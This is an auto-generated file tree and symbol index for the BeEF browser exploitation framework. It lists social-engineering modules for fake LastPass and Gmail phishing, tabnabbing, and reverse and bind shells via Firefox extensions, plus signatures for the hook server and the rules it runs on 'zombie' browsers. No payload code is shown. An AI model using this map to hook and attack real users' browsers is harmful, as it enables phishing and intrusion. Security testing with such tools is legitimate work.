config.yaml │ │ └── module.rb │ └── social_engineering/ │ ├── clickjacking/ │ │ ├── command.js │ │ ├── config.yaml │ │ └── module.rb │ ├── clippy/ │ │ ├── assets/ │ │ │ └── README.txt │ │ ├── command.js │ │ ├── config.yaml │ │ └── module.rb │ ├── edge_wscript_wsh_injection/ │ │ ├── command.js │ │ ├── config.yaml │ │ └── module.rb │ ├── fake_evernote_clipper/ │ │ ├── GothamSSm-Bold.otf │ │ ├── GothamSSm-Medium.otf │ │ ├── command.js │ │ ├── config.yaml │ │ ├── login.css │ │ ├── login.html │ │ └── module.rb │ ├── fake_flash_update/ │ │ ├── command.js │ │ ├── config.yaml │ │ └── module.rb │ ├── fake_lastpass/ │ │ ├── command.js │ │ ├── config.yaml │ │ ├── index-new.html │ │ ├── index.html │ │ └── module.rb │ ├── fake_notification/ │ │ ├── command.js │ │ ├── config.yaml │ │ └── module.rb │ ├── fake_notification_c/ │ │ ├── command.js │ │ ├── config.yaml │ │ └── module.rb │ ├── fake_notification_ff/ │ │ ├── command.js │ │ ├── config.yaml │ │ └── module.rb │ ├── fake_notification_ie/ │ │ ├── command.js │ │ ├── config.yaml │ │ └── module.rb │ ├── firefox_extension_bindshell/ │ │ ├── command.js │ │ ├── config.yaml │ │ ├── extension/ │ │ │ ├── HTML5_Enhancements.xpi │ │ │ ├── bootstrap.js │ │ │ ├── build/ │ │ │ │ └── readme.txt │ │ │ ├── chrome.manifest │ │ │ ├── install.rdf │ │ │ └── overlay.xul │ │ └── module.rb │ ├── firefox_extension_dropper/ │ │ ├── command.js │ │ ├── config.yaml │ │ ├── dropper/ │ │ │ └── readme.txt │ │ ├── extension/ │ │ │ ├── bootstrap.js │ │ │ ├── chrome.manifest │ │ │ ├── install.rdf │ │ │ └── overlay.xul │ │ └── module.rb │ ├── firefox_extension_reverse_shell/ │ │ ├── command.js │ │ ├── config.yaml │ │ ├── extension/ │ │ │ ├── HTML5_Enhancements.xpi │ │ │ ├── bootstrap.js │ │ │ ├── build/ │ │ │ │ └── readme.txt │ │ │ ├── chrome.manifest │ │ │ ├── install.rdf │ │ │ └── overlay.xul │ │ └── module.rb │ ├── gmail_phishing/ │ │ ├── command.js │ │ ├── config.yaml │ │ └── module.rb │ ├── hta_powershell/ │ │ ├── command.js │ │ ├── config.yaml │ │ └── module.rb │ ├── lcamtuf_download/ │ │ ├── command.js │ │ ├── config.yaml │ │ └── module.rb │ ├── pretty_theft/ │ │ ├── command.js │ │ ├── config.yaml │ │ └── module.rb │ ├── replace_video_fake_plugin/ │ │ ├── command.js │ │ ├── config.yaml │ │ └── module.rb │ ├── simple_hijacker/ │ │ ├── command.js │ │ ├── config.yaml │ │ ├── module.rb │ │ └── templates/ │ │ ├── amazon.js │ │ ├── chromecertbeggar.js │ │ ├── chromecertbeggar2.js │ │ ├── confirmbox.js │ │ └── credential.js │ ├── sitekiosk_breakout/ │ │ ├── command.js │ │ ├── config.yaml │ │ └── module.rb │ ├── spoof_addressbar_data/ │ │ ├── command.js │ │ ├── config.yaml │ │ └── module.rb │ ├── tabnabbing/ │ │ ├── command.js │ │ ├── config.yaml │ │ └── module.rb │ ├── text_to_voice/ │ │ ├── command.js │ │ ├── config.yaml │ │ └── module.rb │ └── ui_abuse_ie/ │ ├── command.js │ ├── config.yaml │ ├── module.rb │ └── popunder.html ├── package.json ├── spec/ │ ├── beef/ │ │ ├── api/ │ │ │ └── auth_rate_spec.rb │ │ ├── core/ │ │ │ ├── extension_spec.rb │ │ │ ├── extensions_spec.rb │ │ │ ├── filter/ │ │ │ │ ├── base_spec.rb │ │ │ │ ├── browser_spec.rb │ │ │ │ ├── command_spec.rb │ │ │ │ ├── http_spec.rb │ │ │ │ └── page_spec.rb │ │ │ ├── logger_spec.rb │ │ │ ├── main/ │ │ │ │ ├── autorun_engine/ │ │ │ │ │ └── autorun_engine_spec.rb │ │ │ │ ├── command_spec.rb │ │ │ │ ├── configuration_spec.rb │ │ │ │ ├── crypto_spec.rb │ │ │ │ ├── geoip_spec.rb │ │ │ │ ├── handlers/ │ │ │ │ │ ├── browser_details_handler_spec.rb │ │ │ │ │ ├── browserdetails_spec.rb │ │ │ │ │ ├── commands_spec.rb │ │ │ │ │ └── hookedbrowsers_spec.rb │ │ │ │ ├── migration_spec.rb │ │ │ │ ├── models/ │ │ │ │ │ ├── browser_details_spec.rb │ │ │ │ │ ├── legacybrowseruseragents_spec.rb │ │ │ │ │ ├── optioncache_spec.rb │ │ │ │ │ └── result_spec.rb │ │ │ │ ├── network_stack/ │ │ │ │ │ ├── assethandler_spec.rb │ │ │ │ │ └── handlers/ │ │ │ │ │ ├── dynamic_reconstruction_spec.rb │ │ │ │ │ ├── raw_spec.rb │ │ │ │ │ └── redirector_spec.rb │ │ │ │ ├── router/ │ │ │ │ │ └── router_spec.rb │ │ │ │ └── server_spec.rb │ │ │ ├── module_spec.rb │ │ │ ├── modules_spec.rb │ │ │ ├── ruby/ │ │ │ │ ├── hash_spec.rb │ │ │ │ ├── module_spec.rb │ │ │ │ ├── print_spec.rb │ │ │ │ ├── security_spec.rb │ │ │ │ └── string_spec.rb │ │ │ └── settings_spec.rb │ │ ├── extensions/ │ │ │ ├── adminui_spec.rb │ │ │ ├── dns_spec.rb │ │ │ ├── network_spec.rb │ │ │ ├── proxy_spec.rb │ │ │ ├── qrcode_spec.rb │ │ │ ├── requester_spec.rb │ │ │ ├── social_engineering_spec.rb │ │ │ ├── webrtc_spec.rb │ │ │ ├── websocket_hooked_browser_spec.rb │ │ │ ├── websocket_spec.rb │ │ │ └── xssrays_spec.rb │ │ ├── filesystem_checks_spec.rb │ │ ├── modules/ │ │ │ └── debug/ │ │ │ └── test_beef_debugs_spec.rb │ │ └── security_checks_spec.rb │ ├── features/ │ │ ├── all_modules_spec.rb │ │ └── debug_modules_spec.rb │ ├── requests/ │ │ ├── beef_test_spec.rb │ │ └── login_spec.rb │ ├── spec_helper.rb │ └── support/ │ ├── assets/ │ │ ├── config_new.yaml │ │ └── config_old.yaml │ ├── beef_test.rb │ ├── browserstack/ │ │ ├── osx/ │ │ │ ├── catalina/ │ │ │ │ ├── catalina_chrome_41.config.yml │ │ │ │ ├── catalina_chrome_59.config.yml │ │ │ │ ├── catalina_chrome_81.config.yml │ │ │ │ ├── catalina_firefox_11.config.yml │ │ │ │ ├── catalina_firefox_68esr.config.yml │ │ │ │ ├── catalina_firefox_75.config.yml │ │ │ │ └── catalina_safari_13.config.yml │ │ │ ├── elcapitan/ │ │ │ │ ├── elcapitan_chrome_14.config.yml │ │ │ │ ├── elcapitan_chrome_81.config.yml │ │ │ │ ├── elcapitan_firefox_7.config.yml │ │ │ │ ├── elcapitan_firefox_75.config.yml │ │ │ │ └── elcapitan_safari_9-1.config.yml │ │ │ └── snowleopard/ │ │ │ ├── snowleopard_chrome_14.config.yml │ │ │ ├── snowleopard_chrome_35.config.yml │ │ │ ├── snowleopard_chrome_49.config.yml │ │ │ ├── snowleopard_firefox_38esr.config.yml │ │ │ ├── snowleopard_firefox_42.config.yml │ │ │ ├── snowleopard_firefox_7.config.yml │ │ │ └── snowleopard_safari_5-1.config.yml │ │ └── windows/ │ │ ├── win10/ │ │ │ ├── win10_chrome_37.config.yml │ │ │ ├── win10_chrome_59.config.yml │ │ │ ├── win10_chrome_81.config.yml │ │ │ ├── win10_edge_81.config.yml │ │ │ ├── win10_firefox_32.config.yml │ │ │ ├── win10_firefox_68esr.config.yml │ │ │ ├── win10_firefox_75.config.yml │ │ │ └── win10_ie_11.config.yml │ │ ├── win8/ │ │ │ ├── win8_chrome_22.config.yml │ │ │ ├── win8_chrome_81.config.yml │ │ │ ├── win8_edge_81.config.yml │ │ │ ├── win8_firefox_32.config.yml │ │ │ ├── win8_firefox_75.config.yml │ │ │ └── win8_ie_10.config.yml │ │ └── xp/ │ │ ├── xp_chrome_14.config.yml │ │ ├── xp_chrome_28.config.yml │ │ ├── xp_chrome_43.config.yml │ │ ├── xp_firefox_16.config.yml │ │ ├── xp_firefox_26.config.yml │ │ ├── xp_firefox_45.config.yml │ │ └── xp_ie_7.config.yml │ ├── constants.rb │ ├── simple_rest_client.rb │ └── ui_support.rb ├── test/ │ ├── integration/ │ │ ├── tc_debug_modules.rb │ │ ├── tc_dns_rest.rb │ │ ├── tc_network_rest.rb │ │ ├── tc_proxy.rb │ │ ├── tc_social_engineering_rest.rb │ │ ├── tc_webrtc_rest.rb │ │ └── ts_integration.rb │ └── thirdparty/ │ └── msf/ │ └── unit/ │ ├── BeEF.rc │ ├── tc_metasploit.rb │ └── ts_metasploit.rb ├── tools/ │ ├── bump-version.sh │ ├── csrf_to_beef/ │ │ ├── csrf_to_beef │ │ ├── lib/ │ │ │ ├── module.rb │ │ │ └── output.rb │ │ └── sample.html │ ├── maintenance/ │ │ └── copyright_update.rb │ └── rest_api_examples/ │ ├── autorun │ ├── browser-details │ ├── clone_page │ ├── command-modules │ ├── dns │ ├── export-logs │ ├── lib/ │ │ ├── beef_rest_api.rb │ │ ├── print.rb │ │ └── string.rb │ ├── metasploit │ ├── network │ ├── remove-offline-browsers │ ├── webrtc │ └── xssrays └── update-beef
Showing preview only (209K chars total). Download the full file or copy to clipboard to get everything.
SYMBOL INDEX (2799 symbols across 643 files)
FILE: core/api.rb
type BeEF (line 7) | module BeEF
type API (line 8) | module API
class Registrar (line 12) | class Registrar
method initialize (line 18) | def initialize
method register (line 30) | def register(owner, clss, method, params = [])
method registered? (line 64) | def registered?(owner, clss, method, params = [])
method matched? (line 85) | def matched?(clss, method, params = [])
method unregister (line 101) | def unregister(id)
method get_owners (line 113) | def get_owners(clss, method, params = [])
method verify_api_path (line 134) | def verify_api_path(clss, mthd)
method get_api_path (line 146) | def get_api_path(clss, mthd)
method is_matched_params? (line 161) | def is_matched_params?(reg, params)
method fire (line 183) | def fire(clss, mthd, *args)
FILE: core/api/extension.rb
type BeEF (line 7) | module BeEF
type API (line 8) | module API
type Extension (line 9) | module Extension
FILE: core/api/extensions.rb
type BeEF (line 6) | module BeEF
type API (line 7) | module API
type Extensions (line 8) | module Extensions
function post_load (line 15) | def post_load; end
FILE: core/api/main/configuration.rb
type BeEF (line 6) | module BeEF
type API (line 7) | module API
type Configuration (line 8) | module Configuration
function module_configuration_load (line 16) | def module_configuration_load(mod); end
FILE: core/api/main/migration.rb
type BeEF (line 6) | module BeEF
type API (line 7) | module API
type Migration (line 8) | module Migration
function migrate_commands (line 15) | def migrate_commands; end
FILE: core/api/main/network_stack/assethandler.rb
type BeEF (line 6) | module BeEF
type API (line 7) | module API
type NetworkStack (line 8) | module NetworkStack
type Handlers (line 9) | module Handlers
type AssetHandler (line 10) | module AssetHandler
function bind (line 19) | def self.bind(file, path = nil, extension = nil, count = -1)
function unbind (line 27) | def self.unbind(url)
FILE: core/api/main/server.rb
type BeEF (line 6) | module BeEF
type API (line 7) | module API
type Server (line 8) | module Server
function pre_http_start (line 17) | def pre_http_start(http_hook_server); end
function mount_handler (line 21) | def mount_handler(server); end
function mount (line 28) | def self.mount(url, http_handler_class, args = nil)
function unmount (line 35) | def self.unmount(url)
FILE: core/api/main/server/hook.rb
type BeEF (line 6) | module BeEF
type API (line 7) | module API
type Server (line 8) | module Server
type Hook (line 9) | module Hook
function pre_hook_send (line 17) | def pre_hook_send(handler); end
FILE: core/api/module.rb
type BeEF (line 6) | module BeEF
type API (line 7) | module API
type Command (line 8) | module Command
type Module (line 11) | module Module
function pre_soft_load (line 25) | def pre_soft_load(mod); end
function post_soft_load (line 29) | def post_soft_load(mod); end
function pre_hard_load (line 33) | def pre_hard_load(mod); end
function post_hard_load (line 37) | def post_hard_load(mod); end
function get_options (line 42) | def get_options; end
function override_execute (line 49) | def override_execute(mod, hbsession, opts); end
function get_payload_options (line 54) | def get_payload_options; end
FILE: core/api/modules.rb
type BeEF (line 6) | module BeEF
type API (line 7) | module API
type Modules (line 8) | module Modules
function post_soft_load (line 15) | def post_soft_load; end
FILE: core/bootstrap.rb
type BeEF (line 6) | module BeEF
type Core (line 7) | module Core
FILE: core/core.rb
type BeEF (line 6) | module BeEF
type Core (line 7) | module Core
FILE: core/extension.rb
type BeEF (line 6) | module BeEF
type Extension (line 7) | module Extension
function is_present (line 11) | def self.is_present(ext)
function is_enabled (line 18) | def self.is_enabled(ext)
function is_loaded (line 27) | def self.is_loaded(ext)
function load (line 36) | def self.load(ext)
FILE: core/extensions.rb
type BeEF (line 6) | module BeEF
type Extensions (line 7) | module Extensions
function get_enabled (line 10) | def self.get_enabled
function get_loaded (line 19) | def self.get_loaded
function load (line 28) | def self.load
FILE: core/filters.rb
type BeEF (line 6) | module BeEF
type Filters (line 7) | module Filters
FILE: core/filters/base.rb
type BeEF (line 6) | module BeEF
type Filters (line 7) | module Filters
function is_non_empty_string? (line 11) | def self.is_non_empty_string?(str)
function only? (line 23) | def self.only?(chars, str)
function exists? (line 32) | def self.exists?(chars, str)
function has_null? (line 40) | def self.has_null?(str)
function has_non_printable_char? (line 49) | def self.has_non_printable_char?(str)
function nums_only? (line 58) | def self.nums_only?(str)
function is_valid_float? (line 67) | def self.is_valid_float?(str)
function hexs_only? (line 77) | def self.hexs_only?(str)
function first_char_is_num? (line 86) | def self.first_char_is_num?(str)
function has_whitespace_char? (line 95) | def self.has_whitespace_char?(str)
function alphanums_only? (line 104) | def self.alphanums_only?(str)
function is_valid_ip? (line 120) | def self.is_valid_ip?(ip, version = :both)
function is_valid_private_ip? (line 157) | def self.is_valid_private_ip?(ip)
function is_valid_port? (line 166) | def self.is_valid_port?(port)
function is_valid_domain? (line 176) | def self.is_valid_domain?(domain)
function has_valid_browser_details_chars? (line 187) | def self.has_valid_browser_details_chars?(str)
function has_valid_base_chars? (line 198) | def self.has_valid_base_chars?(str)
function is_valid_yes_no? (line 207) | def self.is_valid_yes_no?(str)
FILE: core/filters/browser.rb
type BeEF (line 6) | module BeEF
type Filters (line 7) | module Filters
function is_valid_browsername? (line 11) | def self.is_valid_browsername?(str) # rubocop:disable Naming/Predica...
function is_valid_osname? (line 22) | def self.is_valid_osname?(str) # rubocop:disable Naming/PredicatePrefix
function is_valid_hwname? (line 33) | def self.is_valid_hwname?(str) # rubocop:disable Naming/PredicatePrefix
function is_valid_browserversion? (line 44) | def self.is_valid_browserversion?(str) # rubocop:disable Naming/Pred...
function is_valid_osversion? (line 58) | def self.is_valid_osversion?(str) # rubocop:disable Naming/Predicate...
function is_valid_browserstring? (line 72) | def self.is_valid_browserstring?(str) # rubocop:disable Naming/Predi...
function is_valid_cookies? (line 83) | def self.is_valid_cookies?(str) # rubocop:disable Naming/PredicatePr...
function is_valid_system_platform? (line 94) | def self.is_valid_system_platform?(str) # rubocop:disable Naming/Pre...
function is_valid_date_stamp? (line 105) | def self.is_valid_date_stamp?(str) # rubocop:disable Naming/Predicat...
function is_valid_cpu? (line 116) | def self.is_valid_cpu?(str) # rubocop:disable Naming/PredicatePrefix
function is_valid_memory? (line 127) | def self.is_valid_memory?(str) # rubocop:disable Naming/PredicatePrefix
function is_valid_gpu? (line 138) | def self.is_valid_gpu?(str) # rubocop:disable Naming/PredicatePrefix
function is_valid_browser_plugins? (line 151) | def self.is_valid_browser_plugins?(str) # rubocop:disable Naming/Pre...
FILE: core/filters/command.rb
type BeEF (line 6) | module BeEF
type Filters (line 7) | module Filters
function is_valid_path_info? (line 11) | def self.is_valid_path_info?(str)
function is_valid_hook_session_id? (line 22) | def self.is_valid_hook_session_id?(str)
function is_valid_command_module_datastore_key? (line 32) | def self.is_valid_command_module_datastore_key?(str)
function is_valid_command_module_datastore_param? (line 42) | def self.is_valid_command_module_datastore_param?(str)
function has_valid_key_chars? (line 52) | def self.has_valid_key_chars?(str)
function has_valid_param_chars? (line 62) | def self.has_valid_param_chars?(str)
FILE: core/filters/http.rb
type BeEF (line 6) | module BeEF
type Filters (line 7) | module Filters
function is_valid_hostname? (line 11) | def self.is_valid_hostname?(str)
function is_valid_verb? (line 20) | def self.is_valid_verb?(verb)
function is_valid_url? (line 25) | def self.is_valid_url?(uri)
function is_valid_http_version? (line 35) | def self.is_valid_http_version?(version)
function is_valid_host_str? (line 42) | def self.is_valid_host_str?(host_str)
function normalize_path (line 50) | def normalize_path(path)
FILE: core/filters/page.rb
type BeEF (line 6) | module BeEF
type Filters (line 7) | module Filters
function is_valid_pagetitle? (line 11) | def self.is_valid_pagetitle?(str)
function is_valid_pagereferrer? (line 22) | def self.is_valid_pagereferrer?(str)
FILE: core/hbmanager.rb
type BeEF (line 6) | module BeEF
type HBManager (line 7) | module HBManager
function get_by_session (line 11) | def self.get_by_session(sid)
function get_by_id (line 18) | def self.get_by_id(id)
FILE: core/logger.rb
type BeEF (line 10) | module BeEF
function logger (line 14) | def logger
FILE: core/main/ar-migrations/001_create_command_modules.rb
class CreateCommandModules (line 1) | class CreateCommandModules < ActiveRecord::Migration[6.0]
method change (line 2) | def change
FILE: core/main/ar-migrations/002_create_hooked_browsers.rb
class CreateHookedBrowsers (line 1) | class CreateHookedBrowsers < ActiveRecord::Migration[6.0]
method change (line 2) | def change
FILE: core/main/ar-migrations/003_create_logs.rb
class CreateLogs (line 1) | class CreateLogs < ActiveRecord::Migration[6.0]
method change (line 2) | def change
FILE: core/main/ar-migrations/004_create_commands.rb
class CreateCommands (line 1) | class CreateCommands < ActiveRecord::Migration[6.0]
method change (line 2) | def change
FILE: core/main/ar-migrations/005_create_results.rb
class CreateResults (line 1) | class CreateResults < ActiveRecord::Migration[6.0]
method change (line 2) | def change
FILE: core/main/ar-migrations/006_create_option_caches.rb
class CreateOptionCaches (line 1) | class CreateOptionCaches < ActiveRecord::Migration[6.0]
method change (line 2) | def change
FILE: core/main/ar-migrations/007_create_browser_details.rb
class CreateBrowserDetails (line 1) | class CreateBrowserDetails < ActiveRecord::Migration[6.0]
method change (line 2) | def change
FILE: core/main/ar-migrations/008_create_executions.rb
class CreateExecutions (line 1) | class CreateExecutions < ActiveRecord::Migration[6.0]
method change (line 2) | def change
FILE: core/main/ar-migrations/009_create_rules.rb
class CreateRules (line 1) | class CreateRules < ActiveRecord::Migration[6.0]
method change (line 2) | def change
FILE: core/main/ar-migrations/010_create_interceptor.rb
class CreateInterceptor (line 1) | class CreateInterceptor < ActiveRecord::Migration[6.0]
method change (line 2) | def change
FILE: core/main/ar-migrations/011_create_web_cloner.rb
class CreateWebCloner (line 1) | class CreateWebCloner < ActiveRecord::Migration[6.0]
method change (line 2) | def change
FILE: core/main/ar-migrations/013_create_network_host.rb
class CreateNetworkHost (line 1) | class CreateNetworkHost < ActiveRecord::Migration[6.0]
method change (line 2) | def change
FILE: core/main/ar-migrations/014_create_network_service.rb
class CreateNetworkService (line 1) | class CreateNetworkService < ActiveRecord::Migration[6.0]
method change (line 2) | def change
FILE: core/main/ar-migrations/015_create_http.rb
class CreateHttp (line 1) | class CreateHttp < ActiveRecord::Migration[6.0]
method change (line 2) | def change
FILE: core/main/ar-migrations/016_create_rtc_status.rb
class CreateRtcStatus (line 1) | class CreateRtcStatus < ActiveRecord::Migration[6.0]
method change (line 2) | def change
FILE: core/main/ar-migrations/017_create_rtc_manage.rb
class CreateRtcManage (line 1) | class CreateRtcManage < ActiveRecord::Migration[6.0]
method change (line 2) | def change
FILE: core/main/ar-migrations/018_create_rtc_signal.rb
class CreateRtcSignal (line 1) | class CreateRtcSignal < ActiveRecord::Migration[6.0]
method change (line 2) | def change
FILE: core/main/ar-migrations/019_create_rtc_module_status.rb
class CreateRtcModuleStatus (line 1) | class CreateRtcModuleStatus < ActiveRecord::Migration[6.0]
method change (line 2) | def change
FILE: core/main/ar-migrations/020_create_xssrays_detail.rb
class CreateXssraysDetail (line 1) | class CreateXssraysDetail < ActiveRecord::Migration[6.0]
method change (line 2) | def change
FILE: core/main/ar-migrations/021_create_dns_rule.rb
class CreateDnsRule (line 1) | class CreateDnsRule < ActiveRecord::Migration[6.0]
method change (line 2) | def change
FILE: core/main/ar-migrations/024_create_autoloader.rb
class CreateAutoloader (line 1) | class CreateAutoloader < ActiveRecord::Migration[6.0]
method change (line 2) | def change
FILE: core/main/ar-migrations/025_create_xssrays_scan.rb
class CreateXssraysScan (line 1) | class CreateXssraysScan < ActiveRecord::Migration[6.0]
method change (line 2) | def change
FILE: core/main/autorun_engine/engine.rb
type BeEF (line 6) | module BeEF
type Core (line 7) | module Core
type AutorunEngine (line 8) | module AutorunEngine
class Engine (line 9) | class Engine
method initialize (line 12) | def initialize
method find_matching_rules_for_zombie (line 30) | def find_matching_rules_for_zombie(browser, browser_version, os,...
method zombie_matches_rule? (line 57) | def zombie_matches_rule?(browser, browser_version, os, os_versio...
method zombie_os_matches_rule? (line 82) | def zombie_os_matches_rule?(os, os_version, rule)
method zombie_browser_matches_rule? (line 148) | def zombie_browser_matches_rule?(browser, browser_version, rule)
method find_and_run_all_matching_rules_for_zombie (line 186) | def find_and_run_all_matching_rules_for_zombie(hb_id)
method run_matching_rules_on_zombie (line 206) | def run_matching_rules_on_zombie(rule_ids, hb_id)
method run_rules_on_zombie (line 238) | def run_rules_on_zombie(rule_ids, hb_id)
method prepare_sequential_wrapper (line 321) | def prepare_sequential_wrapper(mods, order, delay, rule_token)
method prepare_nested_forward_wrapper (line 352) | def prepare_nested_forward_wrapper(mods, code, conditions, order...
method prepare_command (line 474) | def prepare_command(mod, options, hb_id, replace_input, rule_token)
method clean_command_body (line 535) | def clean_command_body(command_body, replace_input)
method compare_versions (line 576) | def compare_versions(ver_a, cond, ver_b)
FILE: core/main/autorun_engine/parser.rb
type BeEF (line 6) | module BeEF
type Core (line 7) | module Core
type AutorunEngine (line 8) | module AutorunEngine
class Parser (line 9) | class Parser
method initialize (line 12) | def initialize
method parse (line 22) | def parse(name, author, browser, browser_version, os, os_version...
FILE: core/main/autorun_engine/rule_loader.rb
type BeEF (line 6) | module BeEF
type Core (line 7) | module Core
type AutorunEngine (line 8) | module AutorunEngine
class RuleLoader (line 9) | class RuleLoader
method initialize (line 12) | def initialize
method load_rule_json (line 20) | def load_rule_json(data)
method update_rule_json (line 112) | def update_rule_json(id, data)
method load_rule_file (line 203) | def load_rule_file(json_rule_path)
method load_directory (line 211) | def load_directory
FILE: core/main/client/browser.js
function unique (line 3962) | function unique(array) {
FILE: core/main/client/init.js
function beef_init (line 72) | function beef_init() {
FILE: core/main/client/lib/evercookie.js
function _ec_dump (line 75) | function _ec_dump(arr, level)
function _ec_replace (line 101) | function _ec_replace(str, key, value)
function _evercookie_flash_var (line 128) | function _evercookie_flash_var(cookie)
function onSilverlightLoad (line 975) | function onSilverlightLoad(sender, args) {
function onSilverlightError (line 984) | function onSilverlightError(sender, args) {
FILE: core/main/client/lib/jquery-migrate-1.4.1.js
function migrateWarn (line 39) | function migrateWarn( msg) {
function migrateWarnProp (line 53) | function migrateWarnProp( obj, prop, value, msg ) {
function jQuerySub (line 355) | function jQuerySub( selector, context ) {
FILE: core/main/client/lib/jquery.blockUI.js
function setup (line 19) | function setup($) {
FILE: core/main/client/lib/json2.js
function f (line 34) | function f(n) {
function this_value (line 41) | function this_value() {
function quote (line 70) | function quote(string) {
function str (line 89) | function str(key, holder) {
function walk (line 293) | function walk(holder, key) {
FILE: core/main/client/lib/platform.js
function capitalize (line 65) | function capitalize(string) {
function cleanupOS (line 78) | function cleanupOS(os, pattern, label) {
function each (line 134) | function each(object, callback) {
function format (line 154) | function format(string) {
function forOwn (line 168) | function forOwn(object, callback) {
function getClassOf (line 183) | function getClassOf(value) {
function isHostType (line 199) | function isHostType(object, property) {
function qualify (line 212) | function qualify(string) {
function reduce (line 224) | function reduce(array, callback) {
function trim (line 239) | function trim(string) {
function parse (line 253) | function parse(ua) {
FILE: core/main/client/lib/webrtcadapter.js
function trace (line 26) | function trace(text) {
function requestUserMedia (line 381) | function requestUserMedia(constraints) {
FILE: core/main/client/webrtc.js
function Beefwebrtc (line 57) | function Beefwebrtc(initiator,peer,turnjson,stunservers,verbparam) {
function onSetSessionDescriptionSuccess (line 500) | function onSetSessionDescriptionSuccess() {
function onSetSessionDescriptionError (line 504) | function onSetSessionDescriptionError() {
FILE: core/main/command.rb
type BeEF (line 7) | module BeEF
type Core (line 8) | module Core
type CommandUtils (line 12) | module CommandUtils
function format_multiline (line 19) | def format_multiline(text)
class CommandContext (line 29) | class CommandContext < Erubis::Context
method initialize (line 35) | def initialize(hash = nil)
class Command (line 44) | class Command
method initialize (line 58) | def initialize(key)
method pre_send (line 76) | def pre_send; end
method callback (line 81) | def callback; end
method process_zombie_response (line 89) | def process_zombie_response(head, params); end
method needs_configuration? (line 95) | def needs_configuration?
method to_json (line 103) | def to_json(*_args)
method build_datastore (line 117) | def build_datastore(data)
method build_callback_datastore (line 128) | def build_callback_datastore(result, command_id, beefhook, http_pa...
method output (line 176) | def output
method save (line 203) | def save(results)
method map_file_to_url (line 217) | def map_file_to_url(file, path = nil, extension = nil, count = 1)
method use (line 226) | def use(component)
method oc_value (line 240) | def oc_value(name)
method apply_defaults (line 248) | def apply_defaults
FILE: core/main/configuration.rb
type BeEF (line 7) | module BeEF
type Core (line 8) | module Core
class Configuration (line 9) | class Configuration
method instance (line 15) | def self.instance
method initialize (line 22) | def initialize(config)
method load (line 43) | def load(file)
method validate (line 51) | def validate
method local_host (line 89) | def local_host
method local_port (line 96) | def local_port
method local_proto (line 103) | def local_proto
method local_https_enabled (line 110) | def local_https_enabled
method public_host (line 116) | def public_host
method beef_host (line 123) | def beef_host
method beef_port (line 130) | def beef_port
method public_enabled? (line 134) | def public_enabled?
method beef_proto (line 141) | def beef_proto
method beef_url_str (line 154) | def beef_url_str
method hook_file_path (line 161) | def hook_file_path
method hook_url (line 168) | def hook_url
method public_port (line 174) | def public_port
method public_https_enabled? (line 186) | def public_https_enabled?
method get (line 195) | def get(key)
method set (line 212) | def set(key, value)
method clear (line 227) | def clear(key)
method load_extensions_config (line 240) | def load_extensions_config
method load_modules_config (line 257) | def load_modules_config
method validate_public_config_variable? (line 286) | def validate_public_config_variable?(config)
FILE: core/main/console/banners.rb
type BeEF (line 6) | module BeEF
type Core (line 7) | module Core
type Console (line 8) | module Console
type Banners (line 9) | module Banners
function print_ascii_art (line 16) | def print_ascii_art
function print_welcome_msg (line 29) | def print_welcome_msg
function print_network_interfaces_count (line 47) | def print_network_interfaces_count
function print_network_interfaces_routes (line 78) | def print_network_interfaces_routes
function print_loaded_extensions (line 107) | def print_loaded_extensions
function print_loaded_modules (line 122) | def print_loaded_modules
function print_websocket_servers (line 129) | def print_websocket_servers
function print_http_proxy (line 140) | def print_http_proxy
function print_dns (line 145) | def print_dns
FILE: core/main/console/commandline.rb
type BeEF (line 8) | module BeEF
type Core (line 9) | module Core
type Console (line 10) | module Console
type CommandLine (line 14) | module CommandLine
function parse (line 31) | def self.parse
FILE: core/main/constants/browsers.rb
type BeEF (line 7) | module BeEF
type Core (line 8) | module Core
type Constants (line 9) | module Constants
type Browsers (line 10) | module Browsers
function friendly_name (line 45) | def self.friendly_name(browser_name)
FILE: core/main/constants/commandmodule.rb
type BeEF (line 7) | module BeEF
type Core (line 8) | module Core
type Constants (line 9) | module Constants
type CommandModule (line 10) | module CommandModule
FILE: core/main/constants/hardware.rb
type BeEF (line 7) | module BeEF
type Core (line 8) | module Core
type Constants (line 9) | module Constants
type Hardware (line 11) | module Hardware
function match_hardware (line 44) | def self.match_hardware(name)
FILE: core/main/constants/os.rb
type BeEF (line 7) | module BeEF
type Core (line 8) | module Core
type Constants (line 9) | module Constants
type Os (line 11) | module Os
function match_os (line 49) | def self.match_os(name)
FILE: core/main/crypto.rb
type BeEF (line 8) | module BeEF
type Core (line 9) | module Core
type Crypto (line 10) | module Crypto
function secure_token (line 21) | def self.secure_token(len = nil)
function api_token (line 39) | def self.api_token
function random_alphanum_string (line 56) | def self.random_alphanum_string(length = 10)
function random_hex_string (line 68) | def self.random_hex_string(length = 10)
function dns_rule_id (line 80) | def self.dns_rule_id
FILE: core/main/geoip.rb
type BeEF (line 7) | module BeEF
type Core (line 8) | module Core
class GeoIp (line 9) | class GeoIp
method initialize (line 12) | def initialize
method enabled? (line 39) | def enabled?
method lookup (line 50) | def lookup(ip)
FILE: core/main/handlers/browserdetails.rb
type BeEF (line 6) | module BeEF
type Core (line 7) | module Core
type Handlers (line 8) | module Handlers
class BrowserDetails (line 10) | class BrowserDetails
method initialize (line 16) | def initialize(data)
method err_msg (line 21) | def err_msg(error)
method setup (line 25) | def setup
method get_param (line 592) | def get_param(query, key)
FILE: core/main/handlers/commands.rb
type BeEF (line 6) | module BeEF
type Core (line 7) | module Core
type Handlers (line 8) | module Handlers
class Commands (line 9) | class Commands
method initialize (line 23) | def initialize(data, kclass)
method setup (line 32) | def setup
method get_param (line 101) | def get_param(query, key)
FILE: core/main/handlers/hookedbrowsers.rb
type BeEF (line 6) | module BeEF
type Core (line 7) | module Core
type Handlers (line 8) | module Handlers
class HookedBrowsers (line 10) | class HookedBrowsers < BeEF::Core::Router::Router
method confirm_browser_user_agent (line 22) | def confirm_browser_user_agent(user_agent)
FILE: core/main/handlers/modules/beefjs.rb
type BeEF (line 6) | module BeEF
type Core (line 7) | module Core
type Handlers (line 8) | module Handlers
type Modules (line 9) | module Modules
type BeEFJS (line 11) | module BeEFJS
function build_beefjs! (line 14) | def build_beefjs!(req_host)
function find_beefjs_component_path (line 121) | def find_beefjs_component_path(component)
function build_missing_beefjs_components (line 134) | def build_missing_beefjs_components(beefjs_components)
FILE: core/main/handlers/modules/command.rb
type BeEF (line 6) | module BeEF
type Core (line 7) | module Core
type Handlers (line 8) | module Handlers
type Modules (line 9) | module Modules
type Command (line 10) | module Command
function add_command_instructions (line 14) | def add_command_instructions(command, hooked_browser)
FILE: core/main/handlers/modules/legacybeefjs.rb
